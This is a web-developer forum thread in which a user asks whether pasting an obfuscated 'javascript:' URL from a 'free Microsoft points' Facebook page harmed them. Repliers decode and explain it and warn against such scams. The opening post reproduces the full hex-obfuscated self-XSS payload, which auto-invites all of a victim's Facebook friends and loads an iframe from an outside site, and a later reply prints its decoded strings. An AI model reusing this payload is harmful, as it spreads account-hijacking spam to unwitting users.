Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 9 of 9
  1. #1
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Was I javascript hacked?

    I have a problem that hopefully someone here can help me with. Since I don't know any Javascript, I thought I would check here.Through a "get free microsoft points" facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar. It appeared that nothing happened, but my friend who knows a little javascript told me that
    the code is nasty stuff that tried to access my computer. I really have two major questions.

    1. What if anything did me entering the code do to my computer?

    2. How do I fix it?

    Before I give the code, little bit about my system. I tried it with both firefox and IE. I am on windows vista 32 bit. I have trend micro anti virus and ran it, nothing suspicious was seen.

    Code:
    javascript:var _0x8a13=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
    "\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79" ,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\ x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22 \x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73 \x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61 \x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x32\x31\x32\x31\x33\x35\x33\x37\x39\x32\x34\x32\x35\x38\x22\x20 \x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74 \x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75 \x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61
    \x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73 ","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\ x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\ x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\
    x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68 \x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\ x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x72\x65\ x61\x6D\x74\x72\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x73\x70\x2E\x68\x74\x6D\x6C\x22\
    x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\ x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\ x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\ x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x8a13[0],_0x8a13[1]
    ,_0x8a13[2],_0x8a13[3],_0x8a13[4],_0x8a13[5],_0x8a13[6],_0x8a13[7],_0x8a13[8],_0x8a13[9] ,_0x8a13[10],_0x8a13[11],_0x8a13[12],_0x8a13[13]]; void (document[variables[2]] (variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]) ;var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); 
    void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x8a13[14]);
    Thanks for everyone's help.

  • #2
    Regular Coder
    Join Date
    Apr 2010
    Posts
    163
    Thanks
    3
    Thanked 25 Times in 25 Posts
    you weren't hacked, js has no effect on anything outside of the page that called it.
    the code was obscurified to make it harder to read, but if you put in your URL bar javascript:alert("\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C") you will see innerHTML, you can do this for the rest of the code to see what it actually said. The code didn't do anything because there is a syntax error in it.

  • #3
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    26,598
    Thanks
    80
    Thanked 4,498 Times in 4,462 Posts
    I don't think it's a virus, per se.

    Just a way to conceal what they are doing to get you to buy into their stuff.

    FWIW, the "hidden strings" in there (the ones that are encoded as "\x69\x6E\x6E\x65\x72..." etc.) are actually these strings:
    Code:
    innerHTML
    app4949752878_body
    getElementById
    <a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=121213537924258" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>
    suggest
    MouseEvents
    createEvent
    click
    initEvent
    dispatchEvent
    select_all
    sgm_invite_form
    /ajax/social_gsubmitDialog
    <iframe src="http://www.dreamtrick.net/msp.html" style="width: 820px; height: 600px;" frameborder=0 scrolling="no"></iframe>
    Hmmmm...maybe I'm wrong.

    It looks like it waits 4 seconds and then does a "select_all" (that is, grabs everything on the page) and then, one second later, submits the stuff it just selected to some place.

    So I *THINK* it is trying to grab all the contents of the page it is installed on and send it off somewhere so that somebody can try to get whatever data they can find there for their own purposes.

    I don't see any way it got anything "off your computer" other than whatever was on the page you were then viewing. If the page you were viewing had your username and password on it, then maybe it swiped them. So go change your password.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #4
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    26,598
    Thanks
    80
    Thanked 4,498 Times in 4,462 Posts
    Quote Originally Posted by gizmo1650 View Post
    The code didn't do anything because there is a syntax error in it.
    ??? I didn't see a syntax error. What did you see?
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.

  • #5
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Thumbs up

    Thanks Old Pedant. What happened to the guy who actually ran that javascript is exactly what you described the javascript does. He said that it selected all the options on the page and then automatically suggested that page to all of his facebook friends.

    Thank you for the quick response! I can stop worrying so much now about it.

  • #6
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    Key words "a little". Your antivirus and firewalls would be throwing up alerts. If the code wasn't put there by you then its possible someone injected it in some way on the server.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #7
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,159
    Thanks
    203
    Thanked 2,548 Times in 2,526 Posts
    Quote Originally Posted by Keychain1234 View Post
    Since I don't know any Javascript, I thought I would check here.Through a "get free microsoft points" facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar.
    Alas, there is one born every minute. I hope that you have learned something from this - never, ever do such a thing. You seem to be a ripe target for phishing and you were lucky that you did not introduce a virus into your machine. The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.

  • #8
    Senior Coder Rowsdower!'s Avatar
    Join Date
    Oct 2008
    Location
    Some say it's everything.
    Posts
    2,027
    Thanks
    5
    Thanked 397 Times in 390 Posts
    Quote Originally Posted by Philip M View Post
    ...The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.
    Call me immature, but that made me chuckle.
    The object of opening the mind, as of opening the mouth, is to shut it again on something solid. –G.K. Chesterton
    See Mediocrity in its Infancy
    It's usually a good idea to start out with this at the VERY TOP of your CSS: * {border:0;margin:0;padding:0;}
    Seek and you shall find... basically:
    validate your markup | view your page cross-browser/cross-platform | free web tutorials | free hosting

  • #9
    Regular Coder
    Join Date
    Jul 2010
    Location
    St George, UT
    Posts
    138
    Thanks
    6
    Thanked 17 Times in 17 Posts
    Quote Originally Posted by Rowsdower! View Post
    Call me immature, but that made me chuckle.
    Pretty immature if you ask me. What are you, 4?



  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •